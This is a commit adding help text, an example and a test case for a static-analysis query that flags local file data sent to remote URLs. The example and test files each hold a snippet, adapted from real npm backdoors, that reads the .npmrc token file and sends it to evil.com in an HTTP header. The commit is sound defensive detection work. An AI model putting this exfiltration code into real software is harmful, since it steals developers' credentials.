JavaScript: Add query help for FileAccessToHttp query.

Max Schaefer · Max Schaefer · commit 22502e7a10e7 · 2018-12-05T13:12:52.000Z
diff --git a/javascript/ql/src/Security/CWE-200/FileAccessToHttp.qhelp b/javascript/ql/src/Security/CWE-200/FileAccessToHttp.qhelp
@@ -0,0 +1,36 @@
+<!DOCTYPE qhelp PUBLIC
+"-//Semmle//qhelp//EN"
+"qhelp.dtd">
+<qhelp>
+
+<overview>
+  <p>
+    Sending local file system data to a remote URL without further
+    validation risks uncontrolled information exposure, and may be
+    an indication of malicious backdoor code that has been
+    implanted into an otherwise trusted code base.
+  </p>
+</overview>
+
+<recommendation>
+  <p>
+    Examine the highlighted code closely to ensure that it is
+    behaving as intended.
+  </p>
+</recommendation>
+
+<example>
+  <p>
+    The following example is adapted from backdoor code that was identified in two
+    popular npm packages. It reads the contents of the <code>.npmrc</code> file
+    (which may contain secret npm tokens) and sends it to a remote server by
+    embedding it into an HTTP request header.
+  </p>
+  <sample src="examples/FileAccessToHttp.js"/>
+</example>
+
+<references>
+  <li>ESLint Blog: <a href="https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes">Postmortem for Malicious Packages Published on July 12th, 2018</a>.</li>
+  <li>OWASP: <a href="https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure">Sensitive Data Exposure</a>.</li>
+</references>
+</qhelp>
diff --git a/javascript/ql/src/Security/CWE-200/examples/FileAccessToHttp.js b/javascript/ql/src/Security/CWE-200/examples/FileAccessToHttp.js
@@ -0,0 +1,10 @@
+var fs = require("fs"),
+    https = require("https");
+
+var content = fs.readFileSync(".npmrc", "utf8");
+https.get({
+  hostname: "evil.com",
+  path: "/upload",
+  method: "GET",
+  headers: { Referer: content }
+}, () => { });
diff --git a/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.expected b/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.expected
@@ -1,4 +1,9 @@
 nodes
+| FileAccessToHttp.js:4:5:4:47 | content |
+| FileAccessToHttp.js:4:15:4:47 | fs.read ... "utf8") |
+| FileAccessToHttp.js:5:11:10:1 | {\\n  hos ... ent }\\n} |
+| FileAccessToHttp.js:9:12:9:31 | { Referer: content } |
+| FileAccessToHttp.js:9:23:9:29 | content |
 | bufferRead.js:12:13:12:43 | buffer |
 | bufferRead.js:12:22:12:43 | new Buf ... s.size) |
 | bufferRead.js:13:53:13:52 | buffer |
@@ -53,6 +58,10 @@ nodes
 | sentAsHeaders.js:24:31:24:53 | "http:/ ... content |
 | sentAsHeaders.js:24:47:24:53 | content |
 edges
+| FileAccessToHttp.js:4:5:4:47 | content | FileAccessToHttp.js:9:23:9:29 | content |
+| FileAccessToHttp.js:4:15:4:47 | fs.read ... "utf8") | FileAccessToHttp.js:4:5:4:47 | content |
+| FileAccessToHttp.js:9:12:9:31 | { Referer: content } | FileAccessToHttp.js:5:11:10:1 | {\\n  hos ... ent }\\n} |
+| FileAccessToHttp.js:9:23:9:29 | content | FileAccessToHttp.js:9:12:9:31 | { Referer: content } |
 | bufferRead.js:12:13:12:43 | buffer | bufferRead.js:13:53:13:52 | buffer |
 | bufferRead.js:12:22:12:43 | new Buf ... s.size) | bufferRead.js:12:13:12:43 | buffer |
 | bufferRead.js:13:53:13:52 | buffer | bufferRead.js:15:26:15:31 | buffer |
@@ -100,6 +109,7 @@ edges
 | sentAsHeaders.js:24:31:24:53 | "http:/ ... content | sentAsHeaders.js:24:20:24:55 | { Refer ... ntent } |
 | sentAsHeaders.js:24:47:24:53 | content | sentAsHeaders.js:24:31:24:53 | "http:/ ... content |
 #select
+| FileAccessToHttp.js:5:11:10:1 | {\\n  hos ... ent }\\n} | FileAccessToHttp.js:4:15:4:47 | fs.read ... "utf8") | FileAccessToHttp.js:5:11:10:1 | {\\n  hos ... ent }\\n} | $@ flows directly to outbound network request | FileAccessToHttp.js:4:15:4:47 | fs.read ... "utf8") | File data |
 | bufferRead.js:33:21:33:28 | postData | bufferRead.js:12:22:12:43 | new Buf ... s.size) | bufferRead.js:33:21:33:28 | postData | $@ flows directly to outbound network request | bufferRead.js:12:22:12:43 | new Buf ... s.size) | File data |
 | googlecompiler.js:38:18:38:26 | post_data | googlecompiler.js:44:54:44:57 | data | googlecompiler.js:38:18:38:26 | post_data | $@ flows directly to outbound network request | googlecompiler.js:44:54:44:57 | data | File data |
 | readFileSync.js:26:18:26:18 | s | readFileSync.js:5:12:5:39 | fs.read ... t.txt") | readFileSync.js:26:18:26:18 | s | $@ flows directly to outbound network request | readFileSync.js:5:12:5:39 | fs.read ... t.txt") | File data |
diff --git a/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js b/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js
@@ -0,0 +1,10 @@
+var fs = require("fs"),
+    https = require("https");
+
+var content = fs.readFileSync(".npmrc", "utf8");
+https.get({
+  hostname: "evil.com",
+  path: "/upload",
+  method: "GET",
+  headers: { Referer: content }
+}, () => { });
